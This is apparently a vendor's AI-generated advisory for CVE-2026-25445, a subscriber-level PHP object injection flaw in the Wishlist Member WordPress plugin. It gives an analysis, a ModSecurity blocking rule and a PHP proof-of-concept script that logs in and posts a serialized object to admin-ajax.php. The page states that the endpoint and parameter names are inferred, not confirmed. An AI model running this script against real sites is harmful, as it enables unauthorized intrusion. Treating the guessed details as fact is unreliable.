Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : April 6, 2026

CVE-2026-25445: Wishlist Member <= 3.29.0 – Authenticated (Subscriber+) PHP Object Injection (wishlist-member-x)

CVE ID CVE-2026-25445
Plugin wishlist-member-x
Severity High (CVSS 7.5)
CWE 502
Vulnerable Version 3.29.0
Patched Version
Disclosed March 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25445 (metadata-based):
The Wishlist Member plugin for WordPress versions up to and including 3.29.0 contains an authenticated PHP object injection vulnerability. Attackers with subscriber-level access or higher can exploit this flaw by submitting malicious serialized data. The CVSS score of 7.5 reflects a high-impact vulnerability with significant confidentiality, integrity, and availability consequences, though exploitation requires a secondary gadget chain.

Atomic Edge research infers the root cause is insecure deserialization of user-controlled input. The CWE-502 classification confirms the plugin passes untrusted data to an unserialize() function. Without a code diff, this conclusion is inferred from the CWE and description. The vulnerable code likely resides in an AJAX handler, REST endpoint, or form processing function that receives serialized data from authenticated users. The plugin fails to validate or sanitize this input before deserialization.

Exploitation requires an authenticated attacker to send a crafted serialized object to a specific plugin endpoint. Based on WordPress plugin patterns, the attack vector is likely a POST request to /wp-admin/admin-ajax.php with an action parameter containing a plugin-specific hook like wlmapi_* or wishlistmember_*. The payload would be a serialized PHP object placed in a POST parameter such as data or settings. Attackers must chain this with a POP gadget from another plugin or theme to achieve code execution.

Remediation requires replacing the insecure unserialize() call with a safe alternative. Developers should implement strict type checking and use JSON decoding for structured data. Input validation must reject any serialized PHP objects. The patched version should also implement proper capability checks for the affected endpoint, though subscriber access appears intentional for the feature.

Successful exploitation leads to arbitrary object injection in the application context. With a suitable POP chain present on the target system, attackers can achieve remote code execution, file deletion, or sensitive data retrieval. The absence of a known POP chain in the core plugin reduces immediate risk but creates a persistent backdoor when combined with other plugins. This vulnerability bypasses standard WordPress security controls by operating through an authenticated, intended functionality.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity 
# Atomic Edge WAF Rule - CVE-2026-25445 (metadata-based)
# This rule blocks exploitation of the PHP object injection vulnerability in Wishlist Member plugin.
# It targets the likely AJAX endpoint with specific parameter patterns for serialized objects.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:2544501,phase:2,deny,status:403,chain,msg:'CVE-2026-25445 via Wishlist Member AJAX - PHP Object Injection',severity:'CRITICAL',tag:'CVE-2026-25445',tag:'wordpress',tag:'wishlist-member',tag:'php-object-injection'"
  SecRule ARGS_POST:action "@rx ^(wlm_|wishlist_member_|wishlistmember_)" "chain"
    SecRule ARGS_POST "@rx (^|&)[^=]*=(O:[0-9]+:|a:[0-9]+:|s:[0-9]+:)" 
      "t:none,t:urlDecodeUni,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-25445 - Wishlist Member <= 3.29.0 - Authenticated (Subscriber+) PHP Object Injection
<?php
/*
 * Proof of Concept for CVE-2026-25445.
 * This script demonstrates the attack vector for authenticated PHP object injection.
 * The exact AJAX action and parameter names are inferred from plugin naming conventions.
 * A generic serialized payload is used, as no public POP chain is documented.
 * Requires valid subscriber credentials and a target with a compatible POP gadget.
 */

$target_url = 'https://target.site/wp-admin/admin-ajax.php';
$username = 'subscriber';
$password = 'password';

// Generic PHP object payload - would require a specific POP chain for effect
$malicious_object = 'O:8:"stdClass":1:{s:4:"test";s:9:"injected";}';

// Initialize cURL session for authentication
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');

// First, authenticate to WordPress (simplified - real exploit would use proper nonce)
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);
$response = curl_exec($ch);

// Check authentication success (basic check)
if (strpos($response, 'dashboard') === false && strpos($response, 'admin-ajax') === false) {
    die('Authentication failed. Check credentials.');
}

// Send exploit payload to suspected AJAX endpoint
// Inferred action name based on plugin slug 'wishlist-member-x'
$exploit_data = array(
    'action' => 'wlm_api',
    'data' => $malicious_object,
    'cmd' => 'update_settings'  // Common parameter in membership plugins
);

curl_setopt($ch, CURLOPT_POSTFIELDS, $exploit_data);
$exploit_response = curl_exec($ch);
curl_close($ch);

// Analyze response for signs of successful injection
if ($exploit_response === false) {
    echo 'Request failed.';
} else {
    echo 'Payload sent. Response length: ' . strlen($exploit_response) . "n";
    // In a real exploit, the response might contain error messages or serialized data
    echo 'Response preview: ' . substr($exploit_response, 0, 200) . "n";
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School